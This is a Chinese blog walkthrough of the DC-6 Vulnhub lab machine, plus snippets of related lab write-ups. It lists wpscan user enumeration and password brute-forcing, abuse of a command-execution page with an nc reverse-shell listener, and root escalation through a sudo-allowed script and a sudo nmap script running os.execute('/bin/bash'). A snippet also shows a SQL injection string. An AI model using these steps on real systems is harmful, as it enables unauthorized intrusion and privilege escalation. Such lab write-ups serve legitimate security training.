[vulhub靶机通关]DC-6(命令执行_nmap提权)

DC-6靶机渗透:命令执行与nmap提权
最新推荐文章于 2025-12-03 12:42:20 发布
原创 最新推荐文章于 2025-12-03 12:42:20 发布 · 159 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全

信息收集

主机探测

端口扫描

扫描网站结构

是cms wordpress

用自带的wpscan 扫描网站的用户名

wpscan -url http://wordy -e u

在靶机页面有提示

我们复制过来 同时将得到的用户名复制

cat /usr/share/wordlists/rockyou.txt| grep k01 > password1.txt


wpscan --url http://wordy -U user1.txt -P password1.txt

扫出来一个账号 mark helpdesk01

扫描网站

dirb  http://wordy

漏洞利用

寻找了一番 找到一个可以进行命令执行的页面 用bp进行抓包

修改 绕过前端验证

用nc反弹一个shell给kali

在kali上开启监听

nc -lvvp 5678

在home/mark目录下找到了 graham的密码

我们试着su能不能su进去

成功

提权

sudo -l 提示backups.sh无命令可以执行

我们在后面追加/bin/bash获得jens的shell

切换到 jens

sudo -u jens ./backups.sh

查看jens的权限

发现nmap有root权限

写一个shell

echo 'os.execute("/bin/bash")' > getshell

os.execute()相当于system()

用nmap执行

sudo nmap --script=getshell

找到flag

Vulhub-DC-5靶场通关攻略
qq_65852138的博客
04-14 1706
一个一个尝试访问,发现thankyou.php发现存在年份显示变化,随着我们的刷新,年份会一直变化。之后在kali中文件所在目录执行传输命令,只知道靶机的connect后面出现数字就算传输成功。包含/etc/passwd文件验证,当然可以多试几个目录,难免有被过滤的文件。编译的时候如果你的kali版本过高,那么就会使用更高级的GLIBC库进行编译。在url后面拼接file=的时候,这个年份便不再显示,至此判断存在文件上传。至于是什么上传方式,这里可以注意下之前扫描端口的时候有一个nginx的服务。
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
网络空间安全学习
04-20 2313
查看sudo -l 下的内容,发现有jens用户限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
[vulhub靶机通关]DC-1(suid)
woxinweizhou的博客
11-04 167
摘要:本实验记录了针对DC1靶机的渗透测试过程。通过nmap扫描确定目标IP和开放端口,利用Drupal漏洞获取初始限。发现数据库凭证后,修改管理员密码登录后台。利用find命令的SUID限进行,最终在系统目录中获取全部4个flag。实验展示了从信息收集、漏洞利用到升的完整渗透流程。
[vulhub靶机通关]DC-2(rbash绕过_git)
woxinweizhou的博客
11-04 290
本文记录了DC-2靶机的渗透测试过程。首先通过nmap扫描发现80和7744端口开放,在网站中发现flag1示使用cewl工具。使用wpscan扫描获得用户名,结合cewl生成的字典爆破出jerry和tom的SSH密码。通过SSH登录后绕过rbash限制,发现flag3示切换用户。在jerry目录找到flag4后,利用git获得root限,最终获取到root目录下的flag。整个过程涉及主机探测、CMS扫描、密码爆破、rbash绕过和git等技术。
DC-6靶机通关
qq_63831588的博客
07-29 2846
做完感觉这个靶机还是很有意思的,并且它其实不难,但是这个思路真的很有意思。首先他的关键点在于让我们通过wp插件的漏洞去拿到webshell其次就是普通用户间的博弈,以往我们都是通过账号密码看来进行切换,而这次是通过sudo普通用户来切换然后最后的还是用的sudo,确实也听巧妙的,这次我愿称之为将 sudo 进行到底!!!~~~~~持续更新中。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-6 通关详解 (靶机搭建教程)
qq_51577576的博客
04-12 2753
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (靶机搭建教程) 从信息收集到拿到低限,最后获取最高限,详细解读
[vulhub靶机通关]DC-7(_定时任务_)
woxinweizhou的博客
11-10 209
本文通过漏洞利用获取DC-7靶机root限。首先探测到Drupal CMS框架,利用源码泄露发现配置文件中的SSH凭证。通过SSH登录后,发现定时任务使用root限执行备份脚本。随后在Drupal后台安装PHP模块并上传反弹shell代码,获取www-data限。最后通过向备份脚本写入NC反弹命令,成功在定时任务执行时触发root限的shell,完成升。整个过程结合了CMS漏洞利用、SSH凭证泄露和定时任务技术。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-9 通关详解 (靶机搭建教程)
qq_51577576的博客
10-28 2188
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-8 通关详解 (靶机搭建教程) 从信息收集到拿到低限,最后获取最高限,详细解读
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 4001
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
DC-9靶机通关
qq_63831588的博客
11-01 1065
端口扫描,sql注入,文件包含,爆破,端口敲门,sudo
(VulnHub靶机通关DC-9
yang1234567898的博客
01-23 950
靶机下载地址:https://download.vulnhub.com/dc/DC-9.zip 主机发现 IP:192.168.43.192 80端口为开放状态,22端口是filtered状态 web渗透 访问80端口的web服务,打开Search界面,输入1' or 1=1 # 存在sql注入 burpsuite抓包然后保存为DC.txt,然后用sqlmap进行爆破 爆库名 python sqlmap.py -r "C:\Users\11989\Desktop\DC.
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 3229
DC-8 前情要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3
苏生要努力
04-25 837
直接使用VMware导入打开就行。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8833
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
CDN:从“网络加速器”到“网络安全盾”的进化之路
qq_46950007的博客
11-30 456
在大多数人的印象中,零九CDN(内容分发网络)的核心使命是 “加速”——让网页加载更快,让视频播放更流畅。这无疑是它诞生之初被赋予的神圣职责。然而,在当今这个网络攻击频发、安全威胁无处不在的时代,CDN的角色已经悄然发生了深刻的演变。它不再仅仅是互联网世界的“超级快递网”,更已进化成为守护网站安全的 “前沿防御盾”。
什么是网络安全网络安全包括哪几个方面?学完能做一名黑客吗?
最新发布
weixin_57514792的博客
12-03 919
什么是网络安全网络安全包括哪几个方面?学完能做一名黑客吗?
网络安全(黑客技术)—2025自学手册
2401_84760527的博客
11-24 1612
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全系列:系统后门与持久化技术深度解析
PyHaVolask的博客
12-03 754
本文系统阐述渗透测试中维持访问限的核心技术,详细解析服务绑定、注册表自启动等持久化机制,涵盖Certutil/Bitsadmin远程下载、Meterpreter进程迁移与痕迹清理等高级操作,并供完整的防御检测与应急响应方案,强调技术沉淀与合法授的重要性。
远程桌面漏洞复现:原理详解+环境搭建+渗透实战(CVE-2019-0708)
mooyuan的网络安全博客
11-25 1232
本文分析了CVE-2019-0708(BlueKeep)远程桌面漏洞,该漏洞影响Windows旧版本系统,攻击者可通过RDP协议远程执行任意代码。文章详细介绍了漏洞原理、影响范围及防范措施,重点演示了利用Metasploit框架进行渗透测试的全过程,包括环境搭建、漏洞探测、模块配置、攻击实施及后渗透操作(创建管理员账号、远程连接等)。通过实验验证了该漏洞的严重性,强调及时打补丁和采取防护措施的重要性。
DC-1靶机渗透测试攻略及DC-2靶机简介
DC-1靶机是Vulnhub供的众多靶机之一,专门设计用于学习和练习渗透测试技术。 DC-1靶机描述中到的渗透测试,是指一种旨在评估计算机系统安全性的方法,通过尝试攻击系统来找到安全弱点。渗透测试人员(俗称“白...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值